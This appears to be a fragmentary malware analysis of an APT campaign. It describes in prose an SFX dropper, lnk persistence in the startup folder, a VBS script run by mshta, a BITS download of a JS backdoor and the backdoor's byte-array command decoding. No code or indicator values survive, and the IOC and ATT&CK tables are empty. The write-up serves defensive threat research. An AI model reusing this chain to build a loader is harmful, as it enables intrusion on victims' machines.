3.7 KiB
3.7 KiB
Malware analysis about unknown Israel APT campaign
Table of Contents
- Malware analysis
- Cyber Threat Intel
- Indicators Of Compromise (IOC)
- References MITRE ATT&CK Matrix
- Links
Malware analysis
Initial vector
The initial vector use an SFX executable, who drop a lnk file for the persistence, a vbs file and the docx file for decoys the victim.
We can also note the multiples possiblities for push the persisitence and options.
This execute the vbs file for push the persistence in the startup menu, hide it in changing these atributes and launch the persistence (lnk file)
This download the VB script and execute it by mshta call.
On the VB code, we can observed that use BITS fonctionality for download by a job the JS script to execute on the victim. Secondly, this check the architecture of the system and execute the correct path of wscript and push the windows out the screen.
JS Backdoor
We can observer that use function for decode the commands with a array of bytes.
For decode the string , we use the next function used by the backdoor for decode the commands.
You can now change the encoded commands.
Cyber kill chain
The process graph resume the cyber kill chain used by the attacker.
Cyber Threat Intel
References MITRE ATT&CK Matrix
List of all the references with MITRE ATT&CK Matrix
| Enterprise tactics | Technics used | Ref URL |
|---|---|---|
Indicators Of Compromise (IOC)
List of all the Indicators Of Compromise (IOC)
| Indicator | Description |
|---|---|
| Domain requested | |
| IP requested | |
| HTTP/HTTPS requests | |
| IP C2 | |
| Domain C2 |